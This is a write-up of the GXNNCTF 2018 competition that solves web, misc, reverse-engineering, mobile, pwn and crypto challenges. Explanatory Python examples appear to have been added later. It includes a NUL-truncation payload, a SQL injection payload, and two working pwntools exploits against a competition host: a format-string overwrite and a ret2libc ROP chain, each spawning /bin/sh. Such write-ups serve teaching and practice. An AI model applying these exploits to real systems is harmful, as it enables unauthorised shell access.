GXNNCTF 2018 We_ax WriteUp (3rd Nanning Cyber Security Technology Competition)

By: We_ax team, Guilin University of Electronic Technology

Web


Super Easy

Points: 100  Type: WEB  Solved

Challenge: A super easy web challenge  http://gxnnctf.gxsosec.cn:12311/

The source uses the ereg function, so we guessed a NUL-byte (%00) truncation vulnerability: ereg works on C strings and stops matching at the first NUL byte.

The later checks require the value not to be numeric while still passing the whitelist (digits 0-9 only).

Payload: ?no=1%001
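The contradiction the challenge relies on (a value that passes a digits-only whitelist yet is not numeric) only works because the whitelist check is not binary-safe. The Python below is an added illustration, not code from the write-up or from PHP: `ereg_like` is an assumed model of the legacy ereg() behaviour (matching stops at the first NUL byte), `is_numeric_like` a rough model of is_numeric(), and `hardened_gate` shows the same two checks with a binary-safe matcher, which is what preg_match gives you in PHP.

```python
import re
from urllib.parse import unquote

DIGITS_ONLY = r"[0-9]+"


def ereg_like(pattern, value):
    """Model of PHP's legacy ereg(): the subject is handled as a C string, so
    matching stops at the first NUL byte.  (Assumed model for the demo, not PHP.)"""
    visible = value.split("\x00", 1)[0]
    return re.fullmatch(pattern, visible) is not None


def is_numeric_like(value):
    """Rough model of PHP is_numeric(): the whole string, NUL bytes included,
    must be a number."""
    return re.fullmatch(r"[0-9]+(\.[0-9]+)?", value) is not None


def vulnerable_gate(no):
    """The challenge's two checks as the write-up describes them: the value must
    pass the digit whitelist (checked with ereg) and must NOT be numeric."""
    return ereg_like(DIGITS_ONLY, no) and not is_numeric_like(no)


def hardened_gate(no):
    """Same two checks with a binary-safe matcher: the whitelist now sees the
    whole string, so anything that passes it is numeric and the contradictory
    combination can no longer be satisfied."""
    whitelisted = re.fullmatch(DIGITS_ONLY, no) is not None
    return whitelisted and not is_numeric_like(no)


def raw_parameter(query_value):
    """What the application receives once the web server has URL-decoded %00."""
    return unquote(query_value)


if __name__ == "__main__":
    value = raw_parameter("1%001")          # "1\x001"
    print(repr(value), vulnerable_gate(value), hardened_gate(value))
```

The practical lesson is the one the challenge teaches: validate the raw, undecoded-length string with a binary-safe function and reject control bytes outright rather than relying on a regex that silently stops at NUL.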

 

Hat Shop

Points: 200  Type: WEB  Unsolved

Challenge: With hats you get stronger; go and buy a few hats. http://gxnnctf.gxsosec.cn:12313


sql???

Points: 200  Type: WEB  Solved

Challenge: Xiao Ming wants to become a hacker, so he is learning to write websites, but he has run into a problem. Help him out.

1. SQL injection attempts failed.

2. A leaked .git directory exposed the source code.

3. Code audit:

In Index:

The code requires that the user record selected by `id` has username `guest` when it is checked the first time,
but `admin` when it is checked the second time.

Because `case` is not filtered, the same `id` expression can evaluate differently on each query by keeping state in a MySQL user variable. Payload: `case when @a is null then @a:=2 else 1 end#` (on the first evaluation @a is NULL, so it is assigned and the expression yields 2; on the second evaluation @a is already set and the expression yields 1).

Add the GET parameter backdoor=Melonrind.

Full query string, URL-encoded:

id=case+when+%40a+is+null+then+%40a%3a%3d2+else+1+end%23&backdoor=Melonrind

which decodes to:

id=case when @a is null then @a:=2 else 1 end#&backdoor=Melonrind

 

 

Misc

 

 

Too Easy

Points: 50  Type: MISC  Solved

Challenge: http://www.gxsosec.cn/resources/uploads/file/20181214/d25ebcc135cad51d4d4b6aca36203a34.zip

The flag file is a zip archive whose file header is damaged. Repair the header and extract it to get the flag.
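The following Python is an added example, not the team's code: it builds a small archive, damages the local file header the way such a challenge might, shows that `zipfile.is_zipfile` still answers yes (it only looks at the end-of-central-directory record) while reading an entry fails, and repairs the four signature bytes `PK\x03\x04`. The flag text and the form of damage are constructed for the demo.

```python
import io
import zipfile

LOCAL_HEADER_MAGIC = b"PK\x03\x04"   # signature of every zip local file header


def make_sample_zip():
    """Constructed stand-in for the challenge file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "gxnnctf{constructed_sample_flag}")
    return buf.getvalue()


def corrupt_header(data):
    """Assumed damage: the first four bytes (the local header signature) are zeroed."""
    return b"\x00" * 4 + data[4:]


def has_local_header(data):
    return data.startswith(LOCAL_HEADER_MAGIC)


def passes_is_zipfile(data):
    """zipfile.is_zipfile() checks the end-of-central-directory record, not the
    first header, so a file with a broken local header still 'looks like' a zip."""
    return zipfile.is_zipfile(io.BytesIO(data))


def repair_zip_header(data):
    """Restore the local file header signature.  Only the magic is rewritten; the
    remaining header fields must still be intact for extraction to work."""
    if has_local_header(data):
        return data
    return LOCAL_HEADER_MAGIC + data[4:]


def read_entry(data, name):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def entry_readable(data, name):
    """True if the entry extracts; zipfile raises BadZipFile on a bad header magic."""
    try:
        read_entry(data, name)
        return True
    except zipfile.BadZipFile:
        return False


if __name__ == "__main__":
    damaged = corrupt_header(make_sample_zip())
    print("is_zipfile:", passes_is_zipfile(damaged), "readable:", entry_readable(damaged, "flag.txt"))
    print(read_entry(repair_zip_header(damaged), "flag.txt"))
```

If the signature is intact but extraction still fails, the damage is elsewhere in the header (version, flags, compression method, or the sizes), which a hex editor comparison against a known-good archive will show.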

 

 

 

 

misc2

Points: 100  Type: MISC  Solved

Challenge: Xiao Ming was downloading a resource and ended up with an archive instead, and he has no password. Can you help him? http://www.gxsosec.cn/resources/uploads/file/20181214/6bce69d2b9b8c62e90f089d86b5a729c.zip

1. Use a CRC32 collision to recover the contents of the small txt files.

2. Concatenate the recovered strings and base64-decode the result.
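Both steps on a constructed archive, as an added example (not the team's script): a base64 string is split into 3-character text entries, then only the CRC32 and uncompressed size from each entry's central-directory record are used to recover the bytes by brute force, and the pieces are joined and decoded. The secret, piece length and alphabet are assumptions for the demo; Python cannot write password-protected zips, but classic PKZIP encryption stores the CRC of the plaintext in the headers just the same, which is exactly why the technique works on the challenge file.

```python
import base64
import io
import itertools
import string
import zipfile
import zlib

BASE64_ALPHABET = string.ascii_letters + string.digits + "+/="
PIECE_LEN = 3
SECRET = b"tiny!"   # constructed sample secret; the challenge had its own text


def make_sample_archive(secret=SECRET):
    """Constructed stand-in for the challenge archive: a base64 string split into
    tiny .txt entries, one per piece."""
    encoded = base64.b64encode(secret).decode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n, start in enumerate(range(0, len(encoded), PIECE_LEN)):
            zf.writestr("%d.txt" % n, encoded[start:start + PIECE_LEN])
    return buf.getvalue()


def crack_crc32(target_crc, length, alphabet=string.printable):
    """Try every string of `length` characters over `alphabet` until one has the
    wanted CRC32.  Only feasible for very short files: the search space is
    len(alphabet) ** length, and for longer files collisions become ambiguous."""
    for candidate in itertools.product(alphabet.encode(), repeat=length):
        data = bytes(candidate)
        if zlib.crc32(data) == target_crc:
            return data.decode()
    return None


def recover_pieces(archive, alphabet=BASE64_ALPHABET):
    """Read CRC32 and uncompressed size from the central directory of each entry
    (no entry content is read) and recover each tiny file by collision."""
    pieces = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        entries = sorted(zf.infolist(), key=lambda info: int(info.filename.split(".")[0]))
        for info in entries:
            pieces.append(crack_crc32(info.CRC, info.file_size, alphabet))
    return pieces


def recover_secret(archive):
    """Step 2 of the write-up: concatenate the recovered strings and base64-decode."""
    return base64.b64decode("".join(recover_pieces(archive)))


if __name__ == "__main__":
    archive = make_sample_archive()
    print(recover_pieces(archive))
    print(recover_secret(archive))
```

The alphabet is restricted to base64 characters because step 2 tells us what the pieces must be; for unknown content `string.printable` is the usual starting point, at the cost of a search space of 100^n.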

 

 

 

 

What Is This

Points: 100  Type: MISC  Unsolved

Challenge:

666666 (the challenge file has been updated)

http://www.gxsosec.cn/resources/uploads/file/20181215/0e7a481704ceb84b8ef1904a62f023c0.zip

 

 

Unknown File

Points: 200  Type: MISC  Solved

Challenge: Xiao Ming downloaded another archive while fetching resources, but it will not open. Can you help him?

1. Viewing the file in hex, it contains a PNG and a pyc file; carve both out.

2. After decompiling the pyc, we need an MD5 value; we tried the MD5 of each of the files:

5dde2e3b6a46a5e7ebe6214347f74f9c
caf2311290e2e1809be5cc606b25b98a
a2bac3d666f32aa9848ab758a5f5331d
e353326bb69da25eb88b26c7cefffa14

C++

#include <iostream>
#include <cstdlib>
using namespace std;

int main()
{
    // MD5 of the file that turned out to be the right one
    char md5[] = "a2bac3d666f32aa9848ab758a5f5331d";
    //char code[] = "ctf_is_so_hard..";
    // comparison constants taken from the decompiled pyc
    char check[] = { 59, 106, 36, 41, 115, 33, 54, 63, 99, 42, 52, 120, 38, 38, 115, 40, 00 };
    // each output character is the XOR of two consecutive MD5 hex digits and one check byte
    for (int i = 0; i < 16; i++)
    {
        cout << (char)(md5[i*2] ^ md5[i*2+1] ^ check[i]);
    }
    cout << endl;
    system("pause");
    return 0;
}
//"hit{stegosaurus}"

The output gives the hint "stegosaurus", a Python bytecode steganography tool.

Run stegosaurus.py on the pyc to view the hidden payload:

gxnnctf{Hldd3n_Tre@sure}

 

txt

Points: 100  Type: MISC  Solved

Challenge:

Xiao Ming downloaded something unrecognisable again while fetching resources. Can you help him?

The text contains invisible, zero-width characters (UTF-8 bytes E2 80 8F, i.e. U+200F RIGHT-TO-LEFT MARK).

GitHub project: https://github.com/offdev/zwsp-steg-js
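An added Python example (not from the write-up and not the zwsp-steg-js format): `find_zero_width` is the detection step, reporting every zero-width or bidi-mark code point in a text, which is what gives such a file away; `hide`/`reveal` implement a toy two-symbol scheme assumed for the demo (U+200B = bit 0, U+200C = bit 1, eight carriers per byte) so the round trip can be checked; `strip_zero_width` is the sanitiser that destroys any such payload in text you re-publish.

```python
# Zero-width and bidi-control code points commonly used as invisible carriers.
# The challenge text used U+200F (UTF-8 E2 80 8F).
ZERO_WIDTH = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u200e": "LEFT-TO-RIGHT MARK",
    "\u200f": "RIGHT-TO-LEFT MARK",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}

# Toy carrier scheme assumed for this demo (NOT zwsp-steg-js's encoding).
BIT0, BIT1 = "\u200b", "\u200c"


def find_zero_width(text):
    """Detection: (index, name) for every zero-width character in the text."""
    return [(i, ZERO_WIDTH[ch]) for i, ch in enumerate(text) if ch in ZERO_WIDTH]


def hide(cover, secret):
    """Embed `secret` (UTF-8) as a run of invisible characters after the first word."""
    bits = "".join("{:08b}".format(b) for b in secret.encode())
    carriers = "".join(BIT0 if bit == "0" else BIT1 for bit in bits)
    head, sep, tail = cover.partition(" ")
    return head + carriers + sep + tail


def reveal(text):
    """Collect the carrier characters in order and reassemble the bytes."""
    bits = "".join("0" if ch == BIT0 else "1" for ch in text if ch in (BIT0, BIT1))
    usable = len(bits) - len(bits) % 8
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    return data.decode("utf-8", errors="replace")


def strip_zero_width(text):
    """Sanitiser: drop every carrier code point; the visible text is unchanged."""
    return "".join(ch for ch in text if ch not in ZERO_WIDTH)


if __name__ == "__main__":
    stego = hide("hello world", "hi")
    print(len(stego), repr(strip_zero_width(stego)))
    print(find_zero_width(stego)[:3], reveal(stego))
```

On a suspicious file, run `find_zero_width` first; a long run of U+200B/U+200C/U+200F characters between two ordinary words is the signature to look for, after which the decoder for the particular tool (here zwsp-steg-js) can be applied.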

 

 

RE

Come Crack It

Points: 200  Type: Reverse  Unsolved

Challenge:

The RAR is encrypted.

http://www.gxsosec.cn/resources/uploads/file/20181214/f7dd43caf14cb4b781ce76c2240efb7c.rar

 

USBKey Crack

Points: 150  Type: Reverse  Solved

Challenge:

A certain organisation's system login

http://www.gxsosec.cn/resources/uploads/file/20181214/0390e3155b79279537ab0d39a70ad603.zip

1. The program calls a DLL; no packer.

2. The DLL has four exports.

Auditing the code, we found:

sub_10009550() contains the login routine:

*Str2 = 'D\08';
v17='R\0j';
v18='T\0E';
v19='j\01';
v20='L\0E';
v21='C\0o';
v22='K\0r';
v23='v\0b';
v24='v\0R';
v25='M\0O';
v26='i\0y';
v27='x\0z';
These are UTF-16 (Unicode) strings; IDA prints each 32-bit word as a multi-character constant with its most significant byte first, so in memory 'D\08' is the text "8D".
v8 = !StrCmpW(v7, L"admin") && !StrCmpNW(v4, Str2, 24);

 

Following the cross-references, we found

sub_100091B0():

v45='l\0f';
v46='g\0a';
v47='T\0{';
v48='a\0h';
v49='_\0t';
v50='s\0i';
v51='A\0_';
v52='_\0n';
v53='w\0A';
v54='0\0s';
v55='e\0m';
v56='L\0_';
v57='f\0i';
v58='}\0e';
Reading the characters out the same way gives the flag.

 

SMC

Points: 100  Type: Reverse  Solved

Challenge:

easy rev

http://www.gxsosec.cn/resources/uploads/file/20181214/8b5b4ee21883d6ee9489e88426b1555f.zip

About binary

1. 32-bit Windows PE
2. UPX packed

Analyze

1. The program first checks whether the last character of the input is '}'.

2. XOR:

#include <iostream>
using namespace std;

int main()
{
    // the two constant tables from the binary; XORing them gives the expected prefix
    int v1[] = { 0xa, 0xf, 0x19, 0x31, 00, 0x14, 0x12, 0xc };
    int v2[] = { 0x6d, 0x77, 0x77, 0x5f, 0x63, 0x60, 0x74, 0x77 };
    for (int i = 0; i < 8; ++i)
    {
        cout << (char)(v1[i] ^ v2[i]);
    }
    return 0;
}
//"gxnnctf{"

3. XOR:

#include <iostream>
using namespace std;

int main()
{
    int v3[] = { 0x3d, 0x0b, 0x5f, 0x08, 0x43 };
    for (int i = 0; i < 5; ++i)
        cout << (char)(v3[i] ^ 0x6e);   // single-byte XOR key 0x6e
    return 0;
}
//"Se1f-"

 

4. Base64:

  base64.b64decode("TTBkaWZ5aW5n") == b"M0difying"

5. Subtract 2 from each character:

#include <iostream>
using namespace std;

int main()
{
    char v4[] = "ae2fg#";           // 6 characters; the loop must not run into the terminator
    for (int i = 0; i < 6; ++i)
        cout << (char)(v4[i] - 2);
    return 0;
}
//"_c0de!"

//gxnnctf{Se1f-M0difying_c0de!}

 

 

twins

Points: 250  Type: Reverse  Solved

Challenge:

http://www.gxsosec.cn/resources/uploads/file/20181214/8f05779b83a5e68c40c5500b26f21f87.zip

About binary

1. 32-bit Windows PE
2. UPX packed
3. MFC

Analyze

1. Set an API breakpoint on MessageBox to find the button handler:

sub_401A90:

 v7 = CString::GetBuffer(&v14, 17);
  if ( CString::IsEmpty(&v14) )
  {
    CWnd::MessageBoxA(v15, "Wrong!", 0, 0);
    CDialog::EndDialog(v15, 0);
  }
  if ( CString::GetLength(&v14) != 16 )
  {
    CWnd::MessageBoxA(v15, "Wrong!", 0, 0);
    CDialog::EndDialog(v15, 0);
  }
  v1 = CString::operator char const *(&v14);
  v2 = sub_40100F(&unk_416900, v1);
  CString::operator=(&v13, v2);
  v6 = CString::GetBuffer(&v13, 33);
  for ( i = 0; i < 16; ++i )
  {
    *(&v8 + 2 * i) = v7[i] / 16 + 48;
    v9[2 * i] = v7[i] % 16 + 48;
  }
  v10 = 0;
  for ( j = 0; j < 32; ++j )
  {
    if ( *(&v8 + j) == v6[j] )
      ++v11;
  }
  if ( v11 == 32 )
  {
    CWnd::MessageBoxA(v15, "Congragulation!", 0, 0);
    CDialog::EndDialog(v15, 0);
  }

Simplified:

char in_str[] = "1234567890123456";   // 16-character input
char str2[33] = { 0 };
String_to_Hex(in_str, str2);          // each byte becomes two characters, '0' + (b / 16) and '0' + (b % 16)
if (strcmp(str2, md5(in_str)) == 0)   // all 32 characters must equal the hex MD5 of the input itself
{
  //Congratulation!
}

This is practically impossible to brute-force (the input's own nibble encoding would have to equal its MD5), so we suspected the challenge hides other code.

2. Reading the assembly, we found a suspicious block: the dialog has a second button that the challenge made invisible.

0x00401D10
IDA had not recognised this block as a function, so it had to be decompiled by hand:
 CString::CString(&v10);
  v73 = 0;
  CString::CString(&v9);
  LOBYTE(v73) = 1;
  CWnd::GetWindowTextA((v72 + 96), &v10);
  v1 = CString::operator char const *(&v10);
  v2 = sub_40100F(&unk_416900, v1);
  CString::operator=(&v9, v2);
  v8 = CString::GetBuffer(&v10, 18);
  for ( i = 0; i < 32; ++i )
    *(&v12 + i) ^= v11;
  v44 = 0;
  if ( operator!=(&v9, &v12) )
  {
    CDialog::EndDialog(v72, 0);
  }
  else
  {
    for ( j = 0; j < 27; ++j )
      v6[j] = *(&v45 + j) ^ v8[(j + 2) % 17];
    v7 = 0;
    CWnd::MessageBoxA(v72, v6, 0, 0);
    CDialog::EndDialog(v72, 0);
  }
  LOBYTE(v73) = 0;
  CString::~CString(&v9);
  v73 = -1;
  return CString::~CString(&v10);
}

Attached C++ code:

#include <iostream>
using namespace std;

int main()
{
    // constants lifted from the hidden handler at 0x00401D10
    int v45[] = { 20, 11, 25, 1, 17, 16, 86, 74, 118, 90, 85, 89, 89, 80, 80, 17, 18, 7, 4, 24, 13, 7, 16, 68, 94, 92, 78 };
    int v12[] = { 8, 12, 95, 14, 83, 88, 91, 14, 88, 12, 91, 82, 15, 15, 89, 90, 93, 93, 92, 82, 89, 14, 92, 15, 89, 14, 94, 90, 93, 11, 12, 8, 0, 106 };
    char input[] = "password0123456789";   // text whose MD5 the hidden handler expects
    int v11 = 106;                         // XOR key applied to v12
    char v6[28] = { 0 };
    // stage 1: recover the MD5 string the handler compares against
    for (int i = 0; i < 32; ++i)
    {
        v12[i] ^= v11;
        cout << (char)v12[i];
    }
    cout << endl;
    // stage 2: the flag is v45 XORed with the input, cycling over its first 17 characters with an offset of 2
    for (int j = 0; j < 27; ++j)
    {
        v6[j] = v45[j] ^ input[(j + 2) % 17];
        cout << (char)v6[j];
    }
    cout << endl;
    return 0;
}

Result:

md5_code="bf5d921d2f18ee3077683d6e3d407afb"
mad_decode="password0123456789"
flag="gxnnctf{Dialoghastwobutton}"

 

Debug

Points: 150  Type: Reverse  Solved

Challenge:

http://www.gxsosec.cn/resources/uploads/file/20181215/cbe109be7e440066d5d393246eca7aa3.zip

1. The ELF file is corrupted.

2. Audit the assembly.

3. Function sub_80484C0():

for ( i = 0; i <= 26; ++i )
    *(&v13 + i) ^= *(&v5 + 4 * (i % 3));
  for ( j = 0; j <= 26; ++j )
  {
    if ( *(&v13 + j) <= 47 || *(&v13 + j) > 57 )
    {
      if ( *(&v13 + j) <= 64 || *(&v13 + j) > 90 )
      {
        if ( *(&v13 + j) <= 96 || *(&v13 + j) > 122 )
          v11[j] = *(&v13 + j) + 1;
        else
          v11[j] = *(&v13 + j) - 32;
      }
      else
      {
        v11[j] = *(&v13 + j) + 32;
      }
    }
    else
    {
      v11[j] = (*(&v13 + j) - 53) % 10 + 48;
    }
  }

C++ code:

#include <iostream>
#include <cstdint>
#include <cstdlib>
using namespace std;

int main()
{
    // buffers and keys lifted from sub_80484C0()
    int8_t v13[] = { -55, 66, -118, -64, 89, -112, -56, 96, -91, -36, 95, -102, -41, 47, -111, -48, 79, -105, -72, 84, -125, -48, 93, -128, -52, 36, -72, 0 };
    int8_t v41[] = { -15, -23, -109, -41, -28, -42, -52, -14, -42, -60, -95, -102, -52, -11, -126, -55, -28, -42, -57, -24, -126, -123, -10, -124, -54, -17, -111, -124, -117, 0 };   // second buffer in the function, not needed for the flag

    int v5[] = { 142, 26, 196 };     // 3-byte XOR key cycled over v13
    int v8[] = { 165, 129, 246 };    // key belonging to v41, unused here
    char v11[28] = { 0 };
    (void)v41;
    (void)v8;

    // step 1: undo the repeating-key XOR
    for (int i = 0; i <= 26; ++i)
    {
        v13[i] ^= v5[(i % 3)];
    }

    // step 2: the case/digit transform from the decompiled function
    for (int j = 0; j <= 26; ++j)
    {
        if (v13[j] <= '/' || v13[j] > '9')
        {
            if (v13[j] <= '@' || v13[j] > 'Z')
            {
                if (v13[j] <= '`' || v13[j] >= 'z')   // changed here from the decompiled "> 'z'" so that 'z' maps to '{'
                    v11[j] = v13[j] + 1;
                else
                    v11[j] = v13[j] - 32;            // lower case -> upper case
            }
            else
            {
                v11[j] = v13[j] + 32;                // upper case -> lower case
            }
        }
        else
        {
            v11[j] = (v13[j] - 53) % 10 + 48;        // digit rotation
        }
    }
    for (int i = 0; i < 27; i++)
    {
        cout << v11[i];
    }
    cout << endl;
    system("pause");
    return 0;
}

gxnnctf{Are_y0u_us1ng_gdb?}

 

 

solving

Points: 300  Type: Reverse  Solved

Challenge:

http://www.gxsosec.cn/resources/uploads/file/20181216/25af80b15e8c3d3a1f6fd4227bca9386.zip

Opened it in IDA.

The strings are quite interesting.

It looked like a challenge we had done before.

The detailed solution was posted earlier:

https://www.52pojie.cn/thread-800582-1-1.html

gxnnctf{logged_in_my_reverse}

 

Mobile

Standard Encryption Algorithm

Points: 300  Type: Android  Solved

Challenge:

http://www.gxsosec.cn/resources/uploads/file/20181214/3cb21e0554e84959d845ae493ff74e7b.zip

1. The native library uses the Twofish algorithm (the decrypt routine really is named Twofish_decryt in the library):

Twofish_setup(T, "faQW1ZKVGhmD7K1uWB9Q0fwP", 192)
Twofish_decryt(T, 99CEE869E3BF3E61927FA66123ABAFD9h, &Result);
Result = "it_w@3_n0t_kn0wn"

2. Dynamic debugging of the .so:

After Twofish_setup, jump to Twofish_decryt(v10, &v12, &v15);
or patch the call to __Z14Twofish_decrytP9twofish_tPhS1_ and read the value pushed by the second of the two `push eax` instructions.

 

 

 

OS_200

Points: 200  Type: iOS  Solved

Challenge:

http://www.gxsosec.cn/resources/uploads/file/20181214/fdcb879f4a93a490581a9433ae2fc68a.zip

Opened it in IDA.

Inside the function we see the RSA decryption (Rsa_decode):

if ( v9 & 1 )
  {
    v10 = objc_msgSend(&OBJC_CLASS___UIAlertView, "alloc");
    v11 = ((id (__cdecl *)(RSA_meta *, SEL, id, id))objc_msgSend)(
            (RSA_meta *)&OBJC_CLASS___RSA,
            "decryptString:privateKey:",
            (id)flag,
            (id)privkey);
    v12 = objc_retainAutoreleasedReturnValue((__int64)v11);
    v15 = objc_msgSend(
            v10,
            "initWithTitle:message:delegate:cancelButtonTitle:otherButtonTitles:",
            CFSTR("info"),
            v12,
            0LL,
            CFSTR("ok"),
            0LL);
    objc_release(v12);
    objc_msgSend(v15, "show");
    objc_storeStrong(&v15, 0LL);
  }

 


 
Ciphertext (the `flag` string handed to decryptString:privateKey:):

tVeemPfsMFeRTEabVJCZyVgj01+uNBrgziTdG6RaJI/UiVNFBZW2mcpkLIWUgqDxw8TQZx+WXQhX+To4auZKSGfG5LL2jnBElSjgUGGwNWM7BYiKERF7oAnOP3KNn2JeFThmYclyATUX//OmnzEp7bOgdr5CvmV2IEa3DFG7tDY=

Private key:

Decrypting with the private key gives

flag{H01id@y_h@ck_ch@11enge}

 

Basic

Her Majesty Queen Elizabeth II

Points: 50  Type: Basic  Unsolved

Challenge:

Basic: FE&pd8dMFLR%)(DsGbhi@/dKPNR'*TUm?\tlr.7RV

 

PWN

format

Points: 200  Type: PWN  Unsolved

Challenge: host:47.106.209.151 port:44444

1. Blind pwn (no binary provided).

2. Format-string vulnerability inside a while loop, so it can be triggered repeatedly.

3. Dumping the binary over the network failed because the connection was too slow.

4. Inspecting addresses on the stack:

for i in range(0, 500):
    p.sendline("%" + str(i) + "$p")   # print the i-th stack argument as a pointer
    raw_input()

We found libc addresses appearing at positions around 260 and above.

5. printf calls vprintf internally; redirecting that call is enough.

exp:

from pwn import *
context.log_level = 'debug'
p = remote('47.106.209.151', 44444)
libc = ELF("./x86_libc.so.6")
payload = '%267$p'                       # leak a libc pointer from the stack
p.sendline(payload)
libc_base = int(p.recv(), 16) - 0x18637
system_libc_addr = libc_base + libc.symbols["system"]
p.sendline("%p")                         # leak a stack pointer
stack = int(p.recv(), 16)
one = 0x3a812 + libc_base
payload = fmtstr_payload(7, {stack-4*8: system_libc_addr, stack-4*6: stack+0x100}, write_size='byte')
payload = payload.ljust(0x100) + '/bin/sh\x00'
p.sendline(payload)
p.interactive()

 

 

 

x64

Points: 200  Type: PWN  Solved

Challenge: host:47.106.209.151 port:55555
http://www.gxsosec.cn/resources/uploads/file/20181215/d77a475ff316855b5931fbe19ab28168.zip

exp:

from pwn import *
context.log_level = "debug"
p = remote("47.106.209.151", 55555)   # process("./pwn") for local testing
elf = ELF("./pwn")
libc = ELF("./x64_libc.so.6")
write_got = elf.got["write"]
print hex(write_got)
p.recv()
raw_input()
# stage 1: overflow the buffer and call write(1, write_got, 8) through the gadget chain at 0x40062a / 0x400610 to leak write's address, then return for a second round
payload = "a"*(8*16+8) + p64(0x0040062a) + p64(0) + p64(1) + p64(write_got) + p64(8) + p64(write_got) + p64(1) + p64(0x00400610) + 56*'a' + p64(0x0040059d)
p.sendline(payload)
str1 = p.recv()[0:8]
write_got_addr = u64(str1)
system_addr = write_got_addr - libc.symbols["write"] + libc.symbols["system"]
binsh_addr = write_got_addr - libc.symbols["write"] + next(libc.search("/bin/sh"))
print hex(system_addr)
print hex(binsh_addr)
# stage 2: pass binsh_addr as the argument via the gadget at 0x400633 and return into system
payload = "a"*(8*16+8) + p64(0x0000000000400633) + p64(binsh_addr) + p64(system_addr) + p64(0x0040059d)
p.sendline(payload)
p.interactive()

 

 

 

Crypto

Vigenère Runs Into Trouble

Points: 200  Type: Crypto  Solved

Challenge:

BZGTNPMMCGZFPUWJCUIGRWXPFNLHZCKOAPGLKYJNRAQFIUYRAVGNPANUMDQOAHMWTGJDXGOMPJPTKAAVZIUIWKVTUCWBWNFWDFUMPJWPMQGPTNWXTSDPLPMWJAXUHHXWPFXXGVAPFNTXVFKOYIRBOQJHCBVWVFYCGQFGUSUBDWVIYATJGTBNDKGHCTMTWIUEFJITVUGJHHIMUVJICUWYQWYGGUWPUUCWIFGWUANILKPHDKOSPJTTWJQOJHXLBJAPZHVQWPDYPGLLGDBCHTGIZCCMEGVIIJLIFFBHSMEGUJHRXBOQUBDNASPEUCWNGWSNWXTSDPLPMWJAIUHUMWPSYCTUWFBMIAMKVBNTDMQNBVDKILQSSDYVWVXIGDQFIBHSLEAVDBXGOLGDBCHTGIZVNFQFKTNGRWXUDCTGKWCOXIXKZPPFDZGXNBAXLGGWBLTLWCKOXAR

Vigenère decryption:

THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITYOFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEENNINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATIONORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDANDFOURTHELABORATORYHASBEENRENAMEDASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGYFLAGISYOUARESOKINDLY
FLAG IS YOU ARE SOKINDLY
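The write-up does not say which key it used. The Python below is an added example (not the team's code) that derives it from the page's own ciphertext/plaintext pair by the known-plaintext relation key[i] = C[i] - P[i] (mod 26), finds the shortest period of that key stream, and decrypts with the result; the key it recovers, ISCBUPT, is computed here rather than quoted from the write-up.

```python
import string

ALPHABET = string.ascii_uppercase

# Ciphertext and plaintext as given in the write-up (upper-case letters only).
CIPHERTEXT = ("BZGTNPMMCGZFPUWJCUIGRWXPFNLHZCKOAPGLKYJNRAQFIUYRAVGNPANUMDQOAHMWTGJDXGOMPJPTKAAVZIUIWKVTUCWBWNFWDFUMPJWPMQGPTNWXTSDPLPMWJAXUHHXWPFXXGVAPFNTXVFKOYIRBOQJHCBVWVFYCGQFGUSUBDWVIYATJGTBNDKGHCTMTWIUEFJITVUGJHHIMUVJICUWYQWYGGUWPUUCWIFGWUANILKPHDKOSPJTTWJQOJHXLBJAPZHVQWPDYPGLLGDBCHTGIZCCMEGVIIJLIFFBHSMEGUJHRXBOQU"
              "BDNASPEUCWNGWSNWXTSDPLPMWJAIUHUMWPSYCTUWFBMIAMKVBNTDMQNBVDKILQSSDYVWVXIGDQFIBHSLEAVDBXGOLGDBCHTGIZVNFQFKTNGRWXUDCTGKWCOXIXKZPPFDZGXNBAXLGGWBLTLWCKOXAR")
PLAINTEXT = ("THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITYOFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEENNINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATIONORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDANDFOURTHELABORATORYHASBEENRENAMED"
             "ASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGYFLAGISYOUARESOKINDLY")


def vigenere_decrypt(ciphertext, key):
    """Classic Vigenère: P[i] = C[i] - key[i mod len(key)] (mod 26)."""
    out = []
    for i, c in enumerate(ciphertext):
        shift = ALPHABET.index(key[i % len(key)])
        out.append(ALPHABET[(ALPHABET.index(c) - shift) % 26])
    return "".join(out)


def recover_keystream(ciphertext, plaintext):
    """Known-plaintext attack: every aligned pair leaks one key letter."""
    return "".join(ALPHABET[(ALPHABET.index(c) - ALPHABET.index(p)) % 26]
                   for c, p in zip(ciphertext, plaintext))


def shortest_period(stream):
    """Smallest p such that stream[i] == stream[i mod p] for all i."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)


def recover_key(ciphertext, plaintext):
    stream = recover_keystream(ciphertext, plaintext)
    return stream[:shortest_period(stream)]


if __name__ == "__main__":
    key = recover_key(CIPHERTEXT[:42], PLAINTEXT[:42])
    print(key)
    print(vigenere_decrypt(CIPHERTEXT, key))
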